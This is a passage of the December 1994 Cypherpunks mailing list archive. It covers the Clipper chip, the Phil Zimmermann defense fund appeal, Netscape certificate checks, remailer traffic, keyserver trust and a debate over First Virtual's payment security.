1994, Bob Snyder wrote: > ... > I really don't want to know how many sips it takes an officer to finish a cup of > coffee, or if the officer has a genital itch problem while sitting in a speed > trap. I think this crosses the line. I don't want to know either, so I'll just ignore that part. Feel free to do the same. > And where do we stop? Do we wire other federal employees?... Good suggestion, Bob. S a n d y From jdblair at nextsrv.cas.muohio.edu Wed Dec 14 20:40:53 1994 From: jdblair at nextsrv.cas.muohio.edu (jdblair at nextsrv.cas.muohio.edu) Date: Wed, 14 Dec 94 20:40:53 PST Subject: 1984 T-shirt news Message-ID: <9412150445.AA08615@nextsrv.cas.muohio.edu> -----BEGIN PGP SIGNED MESSAGE----- More news about the 1984 NSA Shirt: A while ago, David Morrison, of the National Journal (a weekly political commentary journal) contacted me about the 1984 shirt. It turns out somebody else had been wearing one around the office, and he liked the design. He bought one from me, and asked me to send him some information about the issue clipper issue. I packed up a shirt, printed out various articles on both sides of the clipper issue (mostly from the cp archive) wrote up a short summary of each, and included a bit of my own views on the issue. I also included a copy of Tim May's FAQ on a 3.5 inch disk. At any rate, yesterday in the mail I received two copies of the Dec. 10, 1994 National Journal. On p. 2883 (the very first non-advertising page), at the bottom, a box contained a picture of the shirt, w/ the headline "Looks Like a Cheap Chip Shot." The brief text reads: More on the "Clipper" chip, the eavesdroppable encryption key pushed by the National Security Agency: Hearing an NSA spook jest that Big Brother was running 10 years behind schedule, John. D. Blair of Cypherpunks, an anarcho-libertarian Internet group--designed the eye-catching T-shirt at left. "My feelings about its illegitimacy are pretty strong," said Blair, who has sold 250 of the anti-chip shirts on the Net. NSA chief counsel Stewart A. Baker raps Clipper criticism as "the long delayed revenge of people who couldn't go to Woodstock because they had too much trig homework." I don't think the NSA spook part is fair to Kenneth Olthaff, the spook that inspired the shirt. Too bad he didn't include my e-mail address, as well ;) Seriously, though, I've found the shirt has been a good way to get people talking about Clipper, and related issues, here at super-conservative, very pro establishment Miami University (oxford, OH). Its created some inquiry where people had no idea there was even anything to inquire about (or have even heard of the NSA in the first place). If any of you want to resell them, e-mail me and we can work out a deal that makes it worth your time, as well as spread the word about Clipper. The crude web page is still in place with basic info at: http://nextsrv.cas.muohio.edu/t-shirt later, - -john. - -------------------------------------------------------------------------- John Blair: voice: (513) 529-3980 http://nextsrv.cas.muohio.edu/~jdblair 85 81 F8 16 12 97 4C 68 Unix System Administrator, Juggler A1 A0 40 95 BF 03 60 E1 Student of Interdisciplinary Studies (finger me for PGP key) -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLu/JSvU/70a7khXpAQGXqQP/f13xNwEVYefpCGwnETBHzdP1v7fkRpQE Pdb4H8gzn8MclAF5eFNLG9Nlvbh0Fz//Qx941Ud6xKDGBNMj7P9P84A0DcN0Kv2x 5sS1WX5R1NraZi4h7D/Ctfb6dJVQUYb3pqOaQzcmqyzffu+IfOONnzySJ6BF0tmw /kisD0mWK5o= =6cWL -----END PGP SIGNATURE----- From hmiller at orion.it.luc.edu Wed Dec 14 21:07:04 1994 From: hmiller at orion.it.luc.edu (Hugh Miller) Date: Wed, 14 Dec 94 21:07:04 PST Subject: Zimmermann Defense Fund Appeal Message-ID: <9412150506.AA42667@orion.it.luc.edu> -----BEGIN PGP SIGNED MESSAGE----- Phil Zimmermann Legal Defense Fund Appeal In November, 1976, Martin Hellman and Whitfield Diffie announced their discovery of public-key cryptography by beginning their paper with the sentence: "We stand today on the brink of a revolution in cryptography." We stand today on the brink of an important battle in the revolution they unleased. Philip Zimmermann, who encoded and released the most popular and successful program to flow from that discovery, Pretty Good Privacy ("PGP"), may be about to go to court. It has been over fourteen months now since Phil was first informed that he was the subject of a grand jury investigation being mounted by the San Jose, CA, office of US Customs into the international distribution, over the Internet, of the original version of the program. On January 12th, Phil's legal team will meet for the first time with William Keane, Assistant US Attorney for the Northern District of California, who is in charge of the grand jury investigation, in San Jose. An indictment, if one is pursued by the government after this meeting, could be handed down very shortly thereafter. If indicted, Phil would likely be charged with violating statute 22 USC 2778 of the US Code, "Control of arms exports and imports." This is the federal statute behind the regulation known as ITAR, "International Traffic in Arms Regulations," 22 CFR 120.1 et seq. of the Code of Federal Regulations. Specifically, the indictment would allege that Phil violated 22 USC 2778 by exporting an item listed as a "munition" in 22 CFR 120.1 et seq. without having a license to do so. That item is cryptographic software -- PGP. At stake, of course, is far more than establishing whether Phil violated federal law or not. The case presents significant issues and will establish legal precedent, a fact known to everyone involved. According to his lead counsel, Phil Dubois, the US government hopes to establish the proposition that anyone having anything at all to do with an illegal export -- even someone like Phil, whose only involvement was writing the program and making it available to US citizens and who has no idea who actually exported it -- has committed a federal felony offense. The government also hopes to establish the proposition that posting a "munition" on a BBS or on the Internet is exportation. If the government wins its case, the judgment will have a profound chilling effect on the US software industry, on the free flow of information on the emerging global networks, and in particular upon the grassroots movement to put effective cryptography in the hands of ordinary citizens. The US government will, in effect, resurrect Checkpoint Charlie -- on the Information Superhighway. By now, most of us who are reading this know about Phil and the case, whether by having the program and reading the doc files or by seeing reports in the Wall Steet Journal, Time, Scientific American, the New York Times, Wired, US News and World Report, and hundreds of other news outlets; on Usenet groups like talk.crypto.politics or alt.security.pgp; or by listening to Phil give talks such as the one he gave at CFP '94 in Chicago. We know that PGP has made great strides since version 1.0, and is now a sophisticated encryption and key-management package which has become the de facto standard in both micro and mainframe environments. We know that Phil and the PGP development team successfully negotiated a commercial license with Viacrypt, and, through the efforts of MIT, a noncommercial license for PGP with RSA Data Security, the holders of the patent on the RSA algorithm on which PGP is based, thus freeing the program from the shadow of allegations of patent infringement. We know that programs such as PGP represent one of our best bulwarks in the Information Age against the intrusions of public and private information gatherers. We know that PGP is a key tool in insuring that the "Information Superhighway" will open the world to us, without opening us to the world. What we may not all know is the price Phil has had to pay for his courage and willingness to challenge the crypto status quo. For years now Phil has been the point man in the ongoing campaign for freely available effective cryptography for the everyday computer user. The costs, personal and professional, to him have been great. He wrote the original code for PGP 1.0 by sacrificing months of valuable time from his consulting career and exhausting his savings. He continues to devote large amounts of his time to testifying before Congress, doing public speaking engagements around the world, and agitating for "cryptography for the masses," largely at his own expense. He is now working, still for free, on the next step in PGP technology, PGP Phone, which will turn every PC with a sound card and a modem into a secure telephone. And we know that, just last month, he was searched and interrogated in the absence of counsel by US Customs officials upon his return from a speaking tour in Europe. Phil's legal team consists of his lead counsel, Philip Dubois of Boulder, CO; Kenneth Bass of Venable, Baetjer, Howard & Civiletti, in Washington, DC, first counsel for intelligence policy for the Justice Department under President Carter; Eben Moglen, professor of law at Columbia and Harvard Universities; Curt Karnow, a former assistant US attorney and intellectual property law specialist at Landels, Ripley & Diamond in San Francisco; and Thomas Nolan, noted criminal defense attorney in Menlo Park. While this is a stellar legal team, what makes it even more extraordinary is that several of its members have given their time for free to Phil's case. Still, while their time has been donated so far, other expenses -- travel, lodging, telephone, and other costs -- have fallen to Phil. If the indictment is handed down, time and costs will soar, and the members of the team currently working pro bono may no longer be able to. Justice does not come cheap in this country, but Phil deserves the best justice money can buy him. This is where you and I come in. Phil Dubois estimates that the costs of the case, leaving aside the lawyers' fees, will run from US$100,000 - $150,000. If Phil's team must charge for their services, the total cost of the litigation may range as high as US$300,000. The legal defense fund is already several thousand dollars in the red and the airline tickets to San Jose haven't even been purchased yet. In September, 1993 I wrote a letter urging us all to support Phil, shortly after the first subpoenas were issued by Customs. Today the need is greater than ever, and I'm repeating the call. Phil has assumed the burden and risk of being the first to develop truly effective tools with which we all might secure our communications against prying eyes, in a political environment increasingly hostile to such an idea -- an environment in which Clipper chips and digital telephony bills are our own government's answer to our concerns. Now is the time for us all to step forward and help shoulder that burden with him. It is time more than ever. I call on all of us, both here in the US and abroad, to help defend Phil and perhaps establish a groundbreaking legal precedent. PGP now has an installed base of hundreds of thousands of users. PGP works. It must -- no other "crypto" package, of the hundreds available on the Internet and BBS's worldwide, has ever been subjected to the governmental attention PGP has. How much is PGP worth to you? How much is the complete security of your thoughts, writings, ideas, communications, your life's work, worth to you? The price of a retail application package?i Send it. More? Send it. Whatever you can spare: send it. A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has been established with Phil Dubois in Boulder. Donations will be accepted in any reliable form, check, money order, or wire transfer, and in any currency, as well as by credit card. You may give anonymously or not, but PLEASE - give generously. If you admire PGP, what it was intended to do and the ideals which animated its creation, express your support with a contribution to this fund. * * * Here are the details: To send a check or money order by mail, make it payable, NOT to Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the check or money order to the following address: Philip Dubois 2305 Broadway Boulder, CO USA 80304 (Phone #: 303-444-3885) To send a wire transfer, your bank will need the following information: Bank: VectraBank Routing #: 107004365 Account #: 0113830 Account Name: "Philip L. Dubois, Attorney Trust Account" Now here's the neat bit. You can make a donation to the PZDF by Internet mail on your VISA or MasterCard. Worried about snoopers intercepting your e-mail? Don't worry -- use PGP. Simply compose a message in plain ASCII text giving the following: the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank name of your VISA or MasterCard; the name which appears on it (yours, hopefully :-)); a telephone number at which you can be reached in case of problems; the card number; date of expiry; and, most important, the amount you wish to donate. (Make this last item as large as possible.) Then use PGP to encrypt and ASCII-armor the message using Phil Dubois's public key, enclosed below. (You can also sign the message if you like.)i E-mail the output file to Phil Dubois (dubois at csm.org). Please be sure to use a "Subject:" line reading something like "Phil Zimmermann Defense Fund" so he'll know to decrypt it right away. Here is Phil Dubois's public key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.7 mQCNAiyaTboAAAEEAL3DOizygcxAe6OyfcuMZh2XnyfqmLKFDAoX0/FJ4+d2frw8 5TuXc/k5qfDWi+AQCdJaNVT8jlg6bS0HD55gLoV+b6VZxzIpHWKqXncA9iudfZmR rtx4Es82n8pTBtxa7vcQPhCXfjfl+lOMrICkRuD/xB/9X1/XRbZ7C+AHeDONAAUR tCFQaGlsaXAgTC4gRHVib2lzIDxkdWJvaXNAY3NuLm9yZz6JAJUCBRAsw4TxZXmE uMepZt0BAT0OA/9IoCBZLFpF9lhV1+epBi49hykiHefRdQwbHmLa9kO0guepdkyF i8kqJLEqPEUIrRtiZVHiOLLwkTRrFHV7q9lAuETJMDIDifeV1O/TGVjMiIFGKOuN dzByyidjqdlPFtPZtFbzffi9BomTb8O3xm2cBomxxqsV82U3HDdAXaY5Xw== =5uit - -----END PGP PUBLIC KEY BLOCK----- * * * This campaign letter will be posted in a number of Usenet groups. I will also be turning it into a FAQ-formatted document, which will be posted monthly in the relevant groups and which will be available by anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ. If you come upon, or up with, any other ways in which we can help raise funds for Phil, drop me a line at hmiller at luc.edu and let me know, so that I can put it in the FAQ. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLu6xOtEdYC5Hk8UpAQEhFwP+JrEyY1LvnPmcjp+oLGmIAUbZixJj3QfE T3KpjnNotoJ7/CtWF1EjhjHN8IXPgcQcyF3p38ekysARDv0MA4tzXhL1Egdq/7QV L8XW2z0PjWgu8X/Om0eXZkIOGeaoBvP/e/qDYEIcWXtxrwokYcEtoNCR/KQoZw+A 6NnK1nwxnLw= =Ez3J -----END PGP SIGNATURE----- -- Hugh Miller, Ph.D. Voice: 312-508-2727 Asst. Professor of Philosophy FAX: 312-508-2292 Loyola University Chicago Home: 312-338-2689 6525 N. Sheridan Rd. E-mail: hmiller at luc.edu Chicago, IL 60626 WWW: http://www.luc.edu/~hmiller PGP Public Key 4793C529: FC D2 08 BB 0C 6D CB C8 0B F9 BA 55 62 19 40 21 From unicorn at access.digex.net Wed Dec 14 21:11:45 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Wed, 14 Dec 94 21:11:45 PST Subject: rad In-Reply-To: <9412142136.AA05403@komets.k12.cfa.org> Message-ID: On Sat, 13 Nov 1993 ndibble at komets.k12.cfa.org wrote: > I wish the NSA executives would come out of the closet... > It's warm in here. 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From hfinney at shell.portal.com Wed Dec 14 23:38:27 1994 From: hfinney at shell.portal.com (Hal) Date: Wed, 14 Dec 94 23:38:27 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <199412142236.OAA21214@jobe.shell.portal.com> Message-ID: <199412150738.XAA06251@jobe.shell.portal.com> Hal writes: >It appears from your docs that the Netscape client has a File menu item >that brings up a Document Information dialog box which displays the >distinguished names of the certificate issuer and of the subject (the >owner of the key). This does provide a way of checking that you are >securely connected to the server that you expect (assuming that the >name is recognizable to the user). But it sounds like this is not >something which the customer sees automatically. Again, this seems >like an important security aspect which should be displayed more >prominently. >BTW, what do you see in the dialog when you connect securely to >mcom.com? What is the subject name in your certificate? I downloaded the latest Netscape client and tried the https: links at the mcom server. When you switch to secure mode, a large dialog box appears reminding you to check the Document Information. But it has a "don't show again" button and I would imagine that most people would soon use that. The Document Information box shows this information: Encryption Key: Export [40] Name of Server: C=US, ST=California, O=Netscape Communications Corp., CN=mosaic at mcom.com Name of Certifier: C=US, OU=Test CA, O=Netscape Communications Corp. It would be nice if the CN field were the same as the server address. Then the client could check it. Hal From Tony.Gurnick at nzdairy.co.nz Thu Dec 15 01:18:39 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Thu, 15 Dec 94 01:18:39 PST Subject: PGP 2.7 Message-ID: <94121518414205@nzdairy.co.nz> I keep seeing pgp 2.7 in public key & sig blocks. Where do we get it? T From anonymous-remailer at shell.portal.com Thu Dec 15 01:40:43 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 15 Dec 94 01:40:43 PST Subject: PGP 2.7 Message-ID: <199412150940.BAA12796@jobe.shell.portal.com> --> I keep seeing pgp 2.7 in public key & sig blocks. --> Where do we get it? 2.7 is a ViaCrypt product which you have to pay royalties for, and last I heard they didn't include sources with their distribution. Anybody know if they've started sending the sources with the executables?? Here's their addresses and tel #'s: Mail: 9033 N. 24th Avenue Suite 7 Phoenix AZ 85021-2847 Phone: (602) 944-0773 Fax: (602) 943-2601 Internet: viacrypt at acm.org Compuserve: 70304.41 From lmccarth at ducie.cs.umass.edu Thu Dec 15 01:43:21 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 01:43:21 PST Subject: PGP 2.7 Message-ID: <199412150948.EAA29779@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- DNA writes: > I keep seeing pgp 2.7 in public key & sig blocks. > Where do we get it? - - From ViaCrypt (cf. Mike Johnson's Where to Get PGP FAQ, which he coincidentally sent to the list yesterday) - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvAPp2f7YYibNzjpAQFRcQP+KPprizNN0cENgCm6zQDCuuEMwQ9kLXVy H5SD/ZxNIcwKhUhHfJqczN2twUZ03/sK9CRh3Z1NYsnCi9ZqnlUuQvsIYVj6eiyM 5Z86PkxgZeMpZl5CHkvLKKyC2z+n6+Wb/MNSf4f55VRf3Ls25zYKtSz+7RhU+zN8 pp/y77gDLX4= =n9BP - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvAQ1SoZzwIn1bdtAQH9XgGAnZ6uztBdFvhc90EPdkE8nd0JpsRx+g5Y Fk7Xxgw/bpFIhh/LRSfhQqQKxzWt0zfo =TG7Y -----END PGP SIGNATURE----- From shamrock at netcom.com Thu Dec 15 01:51:45 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 15 Dec 94 01:51:45 PST Subject: Less Flaming, More Civility Message-ID: Tim wrote: [...] >Not all debate recently has been insulting, of course. In fact, most >hasn't been. But the insulting tone persists in some of the thread >titles, and in the generally adversarial nature. (If I were Marc A. >or Kipp, I'd not feel very welcome here....a situation which is >counterproductive to our presumed goals.) [...] II was quite surprised that they stayed that calm. MCOM's comming out on the list was rather painfull. Glad to have them here, though. I always looked at the list as place to learn. Past mistakes nonwithstanding, they do seem to be willing to learn. >So, this is my little rant on "Can't we all just get along?" expressed >in a different way. > There is nothing gained by flaming someone. Even if one thinks that they deserve it. Let's not alienate people that come to us to be educated. This would be self defeating. >The Cypherpunks list has become one of several de facto "watering >holes" where diverse participants interact. Let's not blow it. C'punks, when this list started we were a bunch of idealistic privacy freaks. Look who's on the list now: the developers of cutting edge Internet software. They came here because they heard our message. What did Amanda say? Something like "I come here because that's where the ideas are". We have the chance to influence the shape of the Net for years to come. The MCOM folks didn't go to the IETF meeting? Send them an invite for the next one. They never heard of ISIP? Send them a demo and docs. Let's show a "If you have any questions don't hesitate to ask us." attitude. -- Lucky Green PGP encrypted mail preferred. From nobody at jpunix.com Thu Dec 15 03:25:31 1994 From: nobody at jpunix.com (Anonymous) Date: Thu, 15 Dec 94 03:25:31 PST Subject: Zimmermann Defense Fund Appeal Message-ID: <199412151124.FAA22497@jpunix.com> On Wed, 14 Dec 1994, Hugh Miller wrote: > [...] > Phil deserves the best justice money can buy him. So this is the current state of your legal system. Oh dear. From dmandl at panix.com Thu Dec 15 03:45:20 1994 From: dmandl at panix.com (David Mandl) Date: Thu, 15 Dec 94 03:45:20 PST Subject: Question for remailer operators Message-ID: <199412151145.AA14916@panix.com> For the anon remailer operators out there: I'm looking for figures on the average number of messages that pass through the different remailers a day (or week, or whatever). This is for an article I'm working on to be published in a local paper here in NYC. I'd appreciate any numbers I can get from any of you. Estimates are fine if you don't have exact figures. (Sorry to spam the list like this. It's just that I'm sure my list of remailers is very out of date, and even if it's not, I wouldn't know how to reach the operators of most of them.) Many thanks. --Dave. -- Dave Mandl dmandl at panix.com From mbelow at HRZ.Uni-Bielefeld.DE Thu Dec 15 04:41:42 1994 From: mbelow at HRZ.Uni-Bielefeld.DE (Michael Below) Date: Thu, 15 Dec 94 04:41:42 PST Subject: Question for remailer operators In-Reply-To: <199412151145.AA14916@panix.com> Message-ID: <199412151241.AA168845284@dee.hrz.uni-bielefeld.de> Hi! Dave Mandl wrote: > I'm looking for figures on the average number of messages that pass through > the different remailers a day (or week, or whatever). This is for an > article I'm working on to be published in a local paper here in NYC. I'd > appreciate any numbers I can get from any of you. Estimates are fine if > you don't have exact figures. I'm interested in these figures, too, since I'm currently trying to set up a remailer at our local computing centre -- the first argument against it was the lack of bandwidth, since the whole university is using two 64 kBit lines and these guys hope to get an 2 MBit line if they say "no" often enough... It would be great if you could also give me some figures to compare with, f.e. something like "using WWW for one hour equals one day of normal remailer operation" (blind guess). And, last question: Is there some sort of a FAQ or HOWTO "How to convince operators of the necessity / usefulness / non-evilness of anonymous remailers"? ^ ^ ^ ^ ^ ^ (Is this a proper english word?) Since this is my first posting to this list, I'll say something about myself: I'm studying Sociology and Law at the Universitaet Bielefeld / Germany and sit too much in front of computers/X-Terminals. I'm not good at programming and no mathematical genius (or whatever a Cypherpunk should be) -- I'm rather generally interested in security and using cryptography. Currently I'm trying to translate the docs for SFS, but I'm not too fast at that... -Michael From nsb at nsb.fv.com Thu Dec 15 05:05:50 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 05:05:50 PST Subject: properties of FV In-Reply-To: <199412141644.IAA04167@largo.remailer.net> Message-ID: <8iw3vJ70Eyt5JL_jUv@nsb.fv.com> Excerpts from fv: 14-Dec-94 properties of FV eric at remailer.net (3093) > There are two forms of anonymity: counterparty anonymity and issuer > anonymity. FV claims the first but not the second. "Far from > anonymous" may be a little confusing, but it's certainly far from > completely anonymous. Thanks for introducing the useful terminology. You're right, FV provides counterparty anonymity but not issuer anonymity. A useful clarification. > Wrong again. We explicitly permit seller-based accumulation, [...] > Net clearing of this form requires the creation of an entire billing > system for small value which then settles through FV. The very nature > of such a net billing system requires linkability of transaction to > transaction, or in other words generates identity. So FV is > unsuitable for small value anonymous transactions. No, it doesn't require an entire billing system, because it lives entirely on the seller's machine and does nothing except the pre-billing accumulation for a single seller. It requires a simple database and a nightly cron job. The next time I have a day or two free I will probably build such a thing and add it to the free FV software; I don't expect it will be more than a day or two's work, if that. > We expect to make our money on > information products, not on the commerce engine. > At 29 cents plus 4% per settlement transaction, I find this comment > disingenuous in the extreme, even after paying Visa for settlement. Well, at 29+4% it would indeed be disingenious. However, that's not what we're charging -- I'd encourage you to actually read our materials. We're charging 29 cents plus 2%, and this includes all the charges to the credit card networks, the banks, and our financial transaction processors. We are NOT operating on a big margin here. > So if you're planning on removing the cumbersomeness of your current > protocol with software, why is it that you don't have an option to > turn on crypto, whose cumbersomeness can also be mitigated with > software? As I said in an earlier post this morning, this *is* an option we will probably support eventually, although I don't think it is as easy to make crypto easy-to-use as it is to make checkboxes easy-to-use, at least not without deeply compromising the security of the crypto system. Mostly, however,, we just think that it's a longer-term problem, because we see the widespread deployment of crypto as being a longer-term phenomenon. -- Nathaniel From storm at marlin.ssnet.com Thu Dec 15 05:37:11 1994 From: storm at marlin.ssnet.com (Don Melvin) Date: Thu, 15 Dec 94 05:37:11 PST Subject: Zimmermann Defense Fund Appeal In-Reply-To: <199412151124.FAA22497@jpunix.com> Message-ID: <9412151334.AA02326@marlin.ssnet.com> The wise _Anonymous_ is known to have said... > > On Wed, 14 Dec 1994, Hugh Miller wrote: > > > [...] > > Phil deserves the best justice money can buy him. > > So this is the current state of your legal system. Oh dear. Yes, as a matter of fact it is. We have a _legal_ system now, not a _Justice_ system. If it was a Justice system, this more than likely wouldn't be happening. What system do you use? -- America - a country so rich and so strong we can reward the lazy and punish the productive and still survive (so far) Don Melvin storm at ssnet.com finger for PGP key. From ddt at lsd.com Thu Dec 15 06:55:18 1994 From: ddt at lsd.com (ddt at lsd.com) Date: Thu, 15 Dec 94 06:55:18 PST Subject: No Subject Message-ID: X-PGP Key ID: 4AAF00E5 X-PGP Fprint: 30D81F3484E6A83F 6EC8D7F0CAB3D265 Date: Thu, 15 Dec 1994 06:55:23 -0800 To: cypherpunks at toad.com From: ddt at lsd.com (Dave Del Torto) Subject: KEYSRVR: tabula rasa? Cc: Philip Zimmermann , Michael Graff -----BEGIN PGP SIGNED MESSAGE----- [parts from a separate thread w/ Derek] Why is it possible for someone other than ME to add MY key to a keyserver? I realize that at some point (perhaps only the first time you submit a key?), there has to be some trust model employed, but it seems like this anyone-can-submit-anyone-else's-key situation offers a very obvious attack: anyone could propagate bogus keys across the net by just generating bogus keys with someone else's email/name on them, leading to massive impersonation problems. Maybe I'm missing something obvious, but it seems like there should be a more rigorous method available to, and employed by, keyserver operators for verifying someone's identity before accepting a key submitted (supposedly) by them. Shouldn't the key submission msg itself at minimum be required to be contained within a signed msg from someone with enough "nearness" in trust levels from some trusted introducer known to the keyserver op? I thought this sort of situation was precisely the reason for the trust level system in PGP in the first place. This may be a can of worms (or not), but if cpunks require fairly decent methods for verifying the identities of people who want to trade keys with them personally, then it seems keyservers should require at LEAST that level of verification (or better). I'd like to CLEAR/REMOVE ALL keys from ALL keyservers that are: - attributed to me by others (without my knowledge) - added by others (unknown to me) - purporting to have been generated by me) and start with a tabula rasa. Maybe in a few weeks, once all these (what I consider to be) bogus keys are GONE, I can add my actual key to a keyserver. There doesn't seem to be any elegant mechanism available for doing this yet, but I'm ready to be educated on this point. Any comments? dave -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLvANraHBOF9KrwDlAQGVDwQAs4/OuwICvnl+hHpatlcpp8o7MrF21x9f 4SJd0NUJ/koa648bDwr0qxyhs7NSwon2jU4FPI/QBPVAcrsSAMkfXWr2NpF6pOlV TIFIQ9xouT9RP7KT86bU0EiU3RQsO3q8LJRjylWOA2zBEYC+b7Ah5ALfZ/tng293 wE8W2E/rxl0= =64dw -----END PGP SIGNATURE----- From joshua at dee.retix.com Thu Dec 15 07:25:06 1994 From: joshua at dee.retix.com (joshua geller) Date: Thu, 15 Dec 94 07:25:06 PST Subject: Zimmermann Defense Fund Appeal In-Reply-To: <199412151124.FAA22497@jpunix.com> Message-ID: <199412151526.HAA05726@sleepy.retix.com> > On Wed, 14 Dec 1994, Hugh Miller wrote: > > [...] > > Phil deserves the best justice money can buy him. > So this is the current state of your legal system. Oh dear. this has always been the state of the american, and as far as I know of all legal systems. josh From eric at remailer.net Thu Dec 15 07:39:41 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 07:39:41 PST Subject: properties of FV In-Reply-To: <8iw3vJ70Eyt5JL_jUv@nsb.fv.com> Message-ID: <199412151637.IAA06386@largo.remailer.net> > Net clearing of this form requires the creation of an entire billing > system for small value which then settles through FV. No, it doesn't require an entire billing system, because it lives entirely on the seller's machine and does nothing except the pre-billing accumulation for a single seller. Just because it's all on one machine doesn't make it not a billing system. If it does "nothing except pre-billing", then it doesn't have the ability to tie into FV. Such an "accumulation system" has all the properties of a standard billing system. It has accounts with accumulate claims, it periodically asks the customer to pay off liabilities, and it must check that payment has actually been made. Just because the values are small, the process is partially automated, and it all happens much quick does not prevent it from being a billing system. Personally, I'd call it a receivables system, because that's much closer to existing terminology for the actual accounting function. I'm not trying to imply that you couldn't cobble something up fairly quickly, but I have my doubts that a good quick hack will scale appropriately for even a modest sized operation. > The very nature > of such a net billing system requires linkability of transaction to > transaction, or in other words generates identity. So FV is > unsuitable for small value anonymous transactions. I would still like to you address this issue, if only to acknowledge the above characterization. > At 29 cents plus 4% per settlement transaction, I find this comment > disingenuous in the extreme, even after paying Visa for settlement. We're charging 29 cents plus 2%, and this includes all the charges to the credit card networks, the banks, and our financial transaction processors. We are NOT operating on a big margin here. As I had recalled from reading your materials, you were charging 29 cents plus 2% on one leg of the transaction plus an additional 2% on the other. Rereading, this is not the case. Am I remembering a previous situation? As I said in an earlier post this morning, this *is* an option we will probably support eventually, although I don't think it is as easy to make crypto easy-to-use as it is to make checkboxes easy-to-use, at least not without deeply compromising the security of the crypto system. Partial security is better than no security. Deep compromises only happen if your expectations of the crypto system are larger than deserved. If all you expect is a partial solution, other aspects of the cryptography fall away. Just because crypto _can_ do more than one might use it for is no argument for getting _some_ benefit out of it. You've not seen this recently on cypherpunks, but I've been stressing recently the need to deploy partial solutions. Roughly speaking, crypto is good for transit security and storage security. The primary security problem with FV is transit security, not storage security. This is a known solved problem. There are issue of security of private keys stored on Internet machines. Were possession of such a key required in order to crack the system, however, it would be _in addition_ to everything else already required. To mitigate key storage risk I would recommend a key generated entirely and only for use with FV. One of the underlying conceptual problems with allowing a key to be at risk is some sort of belief that compromises of secret keys should never ever EVER be allowed to happen. This is ludicrous. When the benefit of the use of a private key means that it might be compromised, don't rely upon it's not being compromised. In particular, if a digital signature does not, by agreement, carry an implied warrantee of identity, then there's no problem at all. Use the crypto entirely for transit security. If someone hacks your machine and grabs your passphrase and forges a transaction, at least the intruder has to grab your passphrase. Eric From eric at remailer.net Thu Dec 15 07:52:11 1994 From: eric at remailer.net (Eric Hughes) Date: Thu, 15 Dec 94 07:52:11 PST Subject: FV fine print Message-ID: <199412151649.IAA06409@largo.remailer.net> In looking over the FV docs, I found the following interesting tidbit. ---------------------- * YOU shall retain computer data of all sales for at least three years from the date of the transaction. In the event you are not able to store such information, you may contact infohaus-info at fv.com to make storage arrangements. ---------------------- Interpretation is left to the reader. Eric From bdolan at use.usit.net Thu Dec 15 07:59:43 1994 From: bdolan at use.usit.net (Brad Dolan) Date: Thu, 15 Dec 94 07:59:43 PST Subject: Less Flaming, More CivilityZ^^ZY^ In-Reply-To: <199412142057.MAA00850@netcom9.netcom.com> Message-ID: ��XX������\\ On Wed, 14 Dec 1994, Timothy C. May wrote: > > A minor correction, when I wrote: > > > > It may be that the comments made here about the security model of > > Netscape and First Virtual are on the mark, that these models need a > > lot more work. But I don't know see how insults or derision, or > > imputing bad motives to these folks, will help. (I think I was careful > > this past motive to avoid slinging mud at Bill Gates, for example, > ^^^^^^ > > during the debate about reports that Microsoft could be including some > > form of key escrow in future OS releases. Not to say I've never > > flamed...) > > I meant to say "this past summer." > > --Tim > > > -- > ......................................................................... From hfinney at shell.portal.com Thu Dec 15 08:08:42 1994 From: hfinney at shell.portal.com (Hal) Date: Thu, 15 Dec 94 08:08:42 PST Subject: Question for remailer operators In-Reply-To: <199412151145.AA14916@panix.com> Message-ID: <199412151608.IAA00109@jobe.shell.portal.com> I see about 200 messages a day through my remailer, sizes averaging a couple of K. I had the impression at one point that the VAST majority of this was "cover" traffic that someone is generating just to keep the network busy. I don't know if this is still the case. It might be possible to opt out of the cover traffic generator to reduce your load to a politically manageable level. Maybe people generating cover traffic could estimate how many messages they are generating. My remailer is a little unusual as the alumni.caltech.edu remailer always feeds into this one, so this may represent two remailers' worth of traffic. Hal From nsb at nsb.fv.com Thu Dec 15 08:18:02 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Thu, 15 Dec 94 08:18:02 PST Subject: FV fine print In-Reply-To: <24321.787507831.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 FV fine print Eric Hughes at remailer.net (403) > * YOU shall retain computer data of all sales for at least > three years from the date of the transaction. In the event > you are not able to store such information, you may contact > infohaus-info at fv.com to make storage arrangements. > Interpretation is left to the reader. FYI, this is a direct carryover from the standard terms & conditions of a Visa/MasterCard merchant account. Basically, this is a legal necessity to process inquiries from the cardholder's issuing bank, etc. You'll note that we don't say you have to provide the information to us, merely that you have to keep it -- that way, if there's a court action requiring us to provide the information, we can point out that you are required to have the information. If you haven't kept it, you won't have nearly as much of a problem with us as with the government. In any event, the most we can do is say, "oh, you violated our terms and conditions, you can't be an FV seller any more." What we're doing here, in essence, is allowing ANYONE to function as a Visa/MC merchant, with the addition of the 90 day hold and a few other things. In order to do that, our 